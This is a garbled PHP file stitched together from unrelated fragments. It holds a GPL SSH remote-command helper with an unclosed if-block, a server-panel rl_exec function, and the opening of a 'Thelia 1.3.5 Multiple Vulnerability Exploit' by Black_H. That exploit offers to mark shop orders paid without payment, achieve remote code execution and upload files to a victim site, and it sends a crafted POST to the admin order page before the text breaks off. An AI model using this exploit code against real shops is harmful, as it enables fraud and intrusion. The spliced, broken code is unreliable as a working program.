* along with this program; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
* MA 02110-1301, USA.
\*******************************************************************/
define('GS_VALID', true);
/// this is a parent file
require_once dirName(__FILE__) . '/../inc/conf.php';
require_once GS_DIR . 'inc/remote-exec.php';
if ($argc != 4) {
echo 'Usage: ', baseName($argv[0]), " <host> <command> <timeout>\n";
die(1);
}
$host = trim($argv[1]);
$cmd = trim($argv[2]);
$timeout = (int) trim($argv[3]);
remote_exec($host, $cmd, $timeout, $out, $err);
echo implode("\n", $out), "\n";
if ($err == 0) {
$errMsg = 'OK';
} elseif ($err == 119) {
$errMsg = 'SSH ASKS FOR PASSWORD';
} elseif ($err == 118) {
$errMsg = 'SSH ASKS FOR PASSPHRASE';
} elseif ($err == 117) {
$errMsg = 'NO ROUTE TO HOST';
} elseif ($err == 116) {
$errMsg = 'CONNECTION REFUSED';
} elseif ($err == 110) {
$errMsg = 'TIMEOUT';
} elseif ($err == 120) {
$errMsg = 'UNKNOWN REMOTE EXEC ERROR';
/**
* @return void
* @param
* @param
* @desc Remote or local exec. Either exectues it locally or calles remote exec depending on whether $syncserver is localhost or not.
*/
function rl_exec($masterserver, $slaveserver, $cmd)
{
global $gbl, $sgbl, $login, $ghtml;
// Convert to driverapp here. Only here do we have the full information (masterserver/syncserver) to to get the syntosystem class properly.
if ($cmd->action === "set" || $cmd->action === 'dowas') {
$robject = $cmd->robject;
$clo = myclone($robject);
//dprint("Just before $robject {$robject->nname} " . $robject->domain_l . "<br> ");
lxclass::clearChildrenAndParent($clo);
$clo->syncserver = $slaveserver;
$clo->createSyncClass();
//dprint("Just after $robject {$robject->nname} " . $robject->domain_l . "<br> ");
$cmd->robject = $clo;
}
if (!$masterserver || $masterserver === "localhost") {
$cmd->slaveserver = null;
if (!isset($gbl->pserver_password) && isset($cmd->slave_password)) {
$gbl->pserver_password = $cmd->slave_password;
}
$result = remote_exec($slaveserver, $cmd);
} else {
$cmd->slaveserver = $slaveserver;
$result = remote_exec($masterserver, $cmd);
}
return $result;
}
if ($argc < 3) {
echo "\n=___________ Thelia 1.3.5 Multiple Vulnerability Exploit _____________=\n========================================================================\n| Black_H <*****@*****.**> |\n| URL: http://blackh.free.fr - http://blackh.eu |\n========================================================================\n| \$system> {$argv['0']} -url <> -a <1,2,3> -n <> -f <> |\n| Notes: -url ex: http://victim.com/site/ |\n| -a 1 : Validate Command without Payment |\n| -n Commmand number (ex: CDE5627JOC ) |\n| 2 : Remote Code Execution |\n| -n Rubrique id (ex: 1 ) |\n| 3 : Remote File Upload |\n| -n Rubrique id (ex: 1 ) |\n| -f Name of file (ex: leet.php ) |\n| For 2 and 3, the '/client/' directory must not be forbidden |\n========================================================================\n";
exit(1);
}
$url = getparam('url', 1);
$action = getparam('a', 1);
$n = getparam('n', 1);
$f = getparam('f', 0);
$xpl = new phpsploit();
$xpl->agent("Mozilla Firefox");
switch ($action) {
case '1':
valid_command($n);
break;
case '2':
remote_exec($n);
break;
case '3':
remote_upload($n, $f);
break;
default:
die('Please choose an action.');
break;
}
# Validate Command without Payment
function valid_command($n)
{
global $xpl, $url;
echo "\n[-] Change command statut";
echo "\n[-] Command: " . $n;
if ($xpl->post($url . 'admin/commande_details.php?ref=' . $n, 'ref=' . $n . '&statutch=2')) {
